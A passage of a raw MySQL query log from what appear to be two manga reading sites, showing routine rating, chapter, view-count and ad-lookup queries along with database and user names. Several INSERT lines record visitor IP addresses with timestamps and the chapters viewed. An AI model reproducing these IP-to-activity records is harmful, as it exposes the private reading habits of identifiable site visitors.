ratings where manga_id = '302' order by created desc 330639755 Quit 330639756 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639756 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '182' order by created desc 330639756 Quit 330639757 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639757 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '274' order by created desc 330639757 Quit 330639758 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639758 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '329' order by created desc 330639758 Quit 330639759 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639759 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '279' order by created desc 330639759 Quit 330639760 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639760 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '314' order by created desc 330639760 Quit 330639761 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639761 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '332' order by created desc 330639761 Quit 330639762 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639762 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '351' order by created desc 330639762 Quit 330639763 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639763 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '289' order by created desc 330639763 Quit 330639764 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639764 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '343' order by created desc 330639764 Quit 330639765 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639765 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '310' order by created desc 330639765 Quit 330639766 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639766 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '356' order by created desc 330639766 Quit 330639767 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639767 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '301' order by created desc 330639767 Quit 330639768 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639768 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '273' order by created desc 330639768 Quit 330639769 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639769 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '300' order by created desc 330639769 Quit 330639770 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639770 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '263' order by created desc 330639770 Quit 330639771 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639771 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '318' order by created desc 330639771 Quit 330639772 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639772 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '317' order by created desc 330639772 Quit 330639773 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639773 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '382' order by created desc 330639773 Quit 330639774 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639774 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '295' order by created desc 330639774 Quit 330639775 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639775 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '373' order by created desc 330639775 Quit 330639776 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639776 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '245' order by created desc 330639776 Quit 330639777 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639777 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '247' order by created desc 330639777 Quit 330639778 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639778 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '337' order by created desc 330639778 Quit 330639779 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639779 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '299' order by created desc 330639779 Quit 330639780 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639780 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '335' order by created desc 330639780 Quit 330639781 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639781 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '90' order by created desc 330639781 Quit 330639782 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639782 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '265' order by created desc 330639782 Quit 330639783 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639783 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '258' order by created desc 330639783 Quit 330639784 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639784 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '380' order by created desc 330639784 Quit 330639785 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639785 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '334' order by created desc 330639785 Quit 330639786 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639786 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '336' order by created desc 330639786 Quit 330639787 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639787 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '304' order by created desc 330639787 Quit 330639788 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639788 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '297' order by created desc 330639788 Quit 330639789 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639789 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '340' order by created desc 330639789 Quit 330639790 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639790 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '341' order by created desc 330639790 Quit 330639791 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639791 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '374' order by created desc 330639791 Quit 330639792 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639792 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '367' order by created desc 330639792 Quit 330639793 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639793 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '344' order by created desc 330639793 Quit 330639794 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639794 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '352' order by created desc 330639794 Quit 330639795 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639795 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '357' order by created desc 330639795 Quit 330639796 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639796 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '354' order by created desc 330639796 Quit 330639797 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639797 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '386' order by created desc 330639797 Quit 330639798 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639798 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '333' order by created desc 330639798 Quit 330639799 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639799 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '353' order by created desc 330639799 Quit 330639800 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639800 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '350' order by created desc 330639800 Quit 330639801 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639801 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '376' order by created desc 330639801 Quit 330639802 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639802 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '381' order by created desc 330639803 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639802 Quit 330639803 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '346' order by created desc 330639803 Quit 330639804 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639804 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '309' order by created desc 330639804 Quit 330639805 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639805 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '316' order by created desc 330639805 Quit 330639806 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639806 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '384' order by created desc 330639806 Quit 330639807 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639807 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '291' order by created desc 330639807 Quit 330639808 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639808 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '359' order by created desc 330639808 Quit 330639809 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639809 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '377' order by created desc 330639810 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639809 Quit 330639811 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639812 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639811 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '378' order by created desc 330639810 Quit 330639812 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '3951' 330639811 Quit 330639813 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639812 Quit 330639813 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '282' order by created desc 330639814 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639813 Quit 330639814 Query select * FROM chapters where id = '3951' 330639815 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639815 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '345' order by created desc 330639814 Quit 330639815 Quit 330639817 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639817 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '296' order by created desc 330639817 Quit 330639818 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639818 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '360' order by created desc 330639818 Quit 330639816 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639816 Query select * FROM chapters where manga_id = '76' order by id desc 330639819 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639819 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '383' order by created desc 330639819 Quit 330639820 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639820 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '375' order by created desc 330639820 Quit 330639821 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639821 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '305' order by created desc 330639821 Quit 330639822 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639822 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '385' order by created desc 330639822 Quit 330639823 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639823 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '369' order by created desc 330639823 Quit 330639824 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639824 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '387' order by created desc 330639824 Quit 330639825 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639825 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '362' order by created desc 330639825 Quit 330639826 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639826 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '388' order by created desc 330639826 Quit 330639827 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639827 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '364' order by created desc 330639827 Quit 330639828 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639828 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '389' order by created desc 330639828 Quit 330639829 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639829 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '365' order by created desc 330639829 Quit 330639830 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639830 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '379' order by created desc 330639830 Quit 330639831 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639831 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '370' order by created desc 330639831 Quit 330639832 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639832 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '390' order by created desc 330639832 Quit 330639816 Quit 330639833 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639833 Query Update chapters set view=view+1 where id = '3951' 330639833 Quit 330639834 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639834 Query select * FROM chapters where id = '3951' 330639834 Quit 330639835 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639835 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '3951' 330639835 Quit 330639836 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639836 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('76', '3951', '129.222.109.230', 'mangacherri.com', '2026-02-26 03:28:01', '2026-02-26 03:28:01') 330639836 Quit 330639837 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639837 Query select * FROM chapter_images where chapter_id = '3951' 330639140 Quit 330639838 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639839 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639838 Quit 330639839 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330639839 Quit 330639840 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639841 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639841 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330639840 Quit 330639841 Quit 330639842 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639843 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639842 Quit 330639843 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330639843 Quit 330639844 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639845 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639845 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330639844 Quit 330639845 Quit 330639837 Quit 330639846 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639846 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '76' and m.active = 1 330639846 Quit 330639847 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639847 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='76' and m.active = 1 AND (genres like '%Comedy%' OR genres like '%Romance%' OR genres like '%School%' OR genres like '%Shounen%' OR genres like '%Slice of Life%') ORDER BY RAND() limit 10 330639848 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639849 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639849 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '339' and m.active = 1 330639848 Quit 330639849 Quit 330639850 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639850 Query select * FROM chapters where id = '339' 330639850 Quit 330639851 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639851 Query select * FROM chapters where manga_id = '22' order by display_priority ASC, id desc 330639851 Quit 330639852 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639852 Query Update chapters set view=view+1 where id = '339' 330639852 Quit 330639853 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639853 Query select * FROM chapters where id = '339' 330639853 Quit 330639854 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639854 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '339' and m.active = 1 330639854 Quit 330639855 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639855 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('22', '339', '144.129.52.33', 'mangaberri.com', '2026-02-26 03:28:01', '2026-02-26 03:28:01') 330639855 Quit 330639856 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639856 Query select * FROM chapter_images where chapter_id = '339' 330639856 Quit 330639857 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639857 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '22' and m.active = 1 330639857 Quit 330639858 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639858 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='22' and m.active = 1 AND (genres like '%Action%' OR genres like '%Demons%' OR genres like '%Drama%' OR genres like '%Magic%' OR genres like '%Martial Arts%' OR genres like '%School%' OR genres like '%Shounen%' OR genres like '%Super Power%' OR genres like '%Supernatural%') ORDER BY RAND() limit 10 330639858 Quit 330639859 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639860 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639859 Quit 330639860 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330639860 Quit 330639861 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639862 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639861 Quit 330639862 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330639862 Quit 330639863 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639864 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639863 Quit 330639864 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330639864 Quit 330639865 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639866 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639865 Quit 330639866 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330639866 Quit 330639867 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639868 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639867 Quit 330639868 Query select k.* from (select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where genres like '%Manhwa%') as k where latest_chapter_id > 0 330639405 Quit 330639869 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639869 Query select max(c.id) as chapter_id, m.* from chapters as c join mangas as m on (m.id = c.manga_id) where m.active = 1 group by m.id order by chapter_id desc limit 30 330639870 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639871 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639870 Quit 330639871 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '4985' 330639871 Quit 330639872 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639872 Query select * FROM chapters where id = '4985' 330639872 Quit 330639873 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639873 Query select * FROM chapters where manga_id = '99' order by id desc 330639873 Quit 330639874 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639874 Query Update chapters set view=view+1 where id = '4985' 330639874 Quit 330639875 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639875 Query select * FROM chapters where id = '4985' 330639876 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639875 Quit 330639876 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '4985' 330639876 Quit 330639877 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639877 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('99', '4985', '61.239.191.160', 'mangacherri.com', '2026-02-26 03:28:01', '2026-02-26 03:28:01') 330639877 Quit 330639878 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639878 Query select * FROM chapter_images where chapter_id = '4985' 260225 19:28:02 330639869 Quit 330639879 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639879 Query SELECT stats.total_view, stats.latest_chapter_id, latest_chapter.name AS latest_chapter, m.* FROM ( SELECT c.manga_id, SUM(c.view) AS total_view, MAX(c.id) AS latest_chapter_id FROM chapters AS c GROUP BY c.manga_id ) AS stats JOIN chapters AS latest_chapter ON latest_chapter.id = stats.latest_chapter_id JOIN mangas AS m ON m.id = stats.manga_id WHERE m.active = 1 ORDER BY stats.total_view DESC 330639879 Quit 330639880 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639881 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639881 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330639880 Quit 330639881 Quit 330639878 Quit 330639882 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639882 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '99' and m.active = 1 330639882 Quit 330639884 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639883 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639884 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='99' and m.active = 1 AND (genres like '%Comedy%' OR genres like '%Drama%' OR genres like '%Romance%' OR genres like '%School%' OR genres like '%Shoujo%') ORDER BY RAND() limit 10 330639885 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639883 Quit 330639885 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '12499' 330639885 Quit 330639886 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639886 Query select * FROM chapters where id = '12499' 330639886 Quit 330639887 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639887 Query select * FROM chapters where manga_id = '225' order by id desc 330639888 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639847 Quit 330639889 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639888 Quit 330639889 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330639889 Quit 330639887 Quit 330639890 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639890 Query Update chapters set view=view+1 where id = '12499' 330639890 Quit 330639891 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639891 Query select * FROM chapters where id = '12499' 330639893 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639891 Quit 330639893 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '12499' 330639893 Quit 330639892 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639894 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639895 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639894 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('225', '12499', '1.52.111.39', 'mangacherri.com', '2026-02-26 03:28:02', '2026-02-26 03:28:02') 330639892 Quit 330639895 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330639895 Quit 330639896 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639897 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639894 Quit 330639896 Quit 330639897 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330639898 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639897 Quit 330639898 Query select * FROM chapter_images where chapter_id = '12499' 330639898 Quit 330639899 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639900 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639900 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '225' and m.active = 1 330639901 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639899 Quit 330639901 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330639901 Quit 330639900 Quit 330639902 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639902 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='225' and m.active = 1 AND (genres like '%Josei%' OR genres like '%Romance%') ORDER BY RAND() limit 10 330639868 Quit 330639903 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639903 Query SELECT sum(view) as total_view, m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where m.genres like '%Manhwa%' group by manga_id ORDER BY sum(view) DESC 330639903 Quit 330639904 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639905 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639905 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330639904 Quit 330639905 Quit 330639906 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639906 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '89' order by created desc 330639906 Quit 330639907 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639907 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '252' order by created desc 330639907 Quit 330639908 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639908 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '240' order by created desc 330639908 Quit 330639909 Connect 